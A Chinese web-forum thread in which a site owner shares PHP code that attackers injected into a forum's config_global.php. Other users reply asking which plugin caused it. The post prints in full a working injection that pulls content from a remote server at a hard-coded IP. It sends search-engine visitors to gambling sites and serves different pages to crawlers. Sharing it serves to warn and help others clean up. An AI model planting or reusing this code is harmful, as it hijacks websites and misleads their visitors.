config_global.php 配置文件再次被黑客改动

上网溜达 · 发表于 2016-7-11 20:11:35

本帖最后由上网溜达于 2016-7-11 20:16 编辑

一个朋友网站的配置文件 config_global.php 再次被黑客改动，让网站被访问时自动跳转到两个博彩违法网站。
小编在这里分享出代码供大家参考，希望对大家有用。
第一次被修改配置文件，在第99行增加的代码如下：
$foot="data/16-g.html";
$footer=@file_get_contents("http://www.此处保密.com/data/flashdata/default/".$foot);
echo $footer;

本次更加具有特色：
增加了
1、show.php文件
2、news 文件夹这个文件夹里面有成千上万的静态网页，估计这位黑客大哥估计废了不少心思来做的吧
3、new 文件夹这个文件夹是空的
4、配置文件 config_global.php 的第83行被增加代码如下：

set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://104.202.66.106/');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d

iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}

就是这些代码就能让你的网站出现自动跳转。黑客的目的只有一个，就是为了帮助宣传某违法网站。
在此警告一下心存侥幸的这位黑手，为了点小钱，竟然对一个没有流量的地方公益类型小论坛下黑手。想必你也是一时冲动，为了眼前一点小利益，犯下错误。听我一句，悬崖勒马，回头是岸，既往不追。再来一次，一定上报公安局处理。
做事的时候，服务器日志别忘记清除哟。

上网溜达 · 发表于 2016-8-5 19:39:14

问题已经彻底处理好，是因为在后台安装了一个插件导致的。

无心涂鸦 · 发表于 2016-8-6 13:34:16

什么插件曝光一下呗我的也出现了类似的问题

crx349 · 发表于 2016-8-6 13:47:55

中毒了尽快清理做好服务器安全哦

yi66661 · 发表于 2016-8-9 21:03:41

楼主留下QQ 我也出现这样的问题。。。

wtc930 · 发表于 2016-8-10 17:37:31

请问LZ是装了什么插件导致的?

yuesha · 发表于 2020-1-4 10:30:35

我没有按插件一样被黑，不知道是什么原因？

【徐氏·设计· · 发表于 2020-1-4 19:13:09

网上经常有些免费插件基本都有病毒。我的就是，现在还解决不了

evilvoy · 发表于 2020-1-6 23:04:33

哪里下载的插件或者插件名称发不出来才行

_____叁公孑 · 发表于 2020-7-29 22:13:19

我的站点提示这个文件有问题，我是新手，我看不出来，可否指点

		自动登录	找回密码
密码			立即注册

[求助] config_global.php 配置文件再次被黑客改动